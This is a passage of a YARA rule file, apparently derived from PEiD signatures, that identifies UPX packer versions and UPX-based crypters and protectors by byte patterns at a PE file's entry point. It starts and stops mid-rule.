pe.entry_point\r\n\r\n}\r\nrule UPX_v072_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_v10_CyberDoom_Team_X: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_120_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_124_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 34 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n        $b = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXHiT_v001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v060_v061: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 F0 01 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_293_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 D8 01 00 00 83 CD FF 31 DB 90 90 90 90 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 90 90 B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_102_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_030_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 04 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 1A 00 00 00 8D BE E6 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Delphi_stub_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 32 2E 30 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n        $b = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 20 5B 35 30 30 6D 68 7A 5D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v070_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_093_UnHack32_11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 80 43 00 8D BE 00 90 FC FF C7 87 D0 64 04 00 26 81 74 8D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_093_UnHack32_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 A0 43 00 8D BE 00 70 FC FF C7 87 D0 84 04 00 98 C1 DF 2D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n        $b = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n        $b = { 9C 60 E8 00 00 00 00 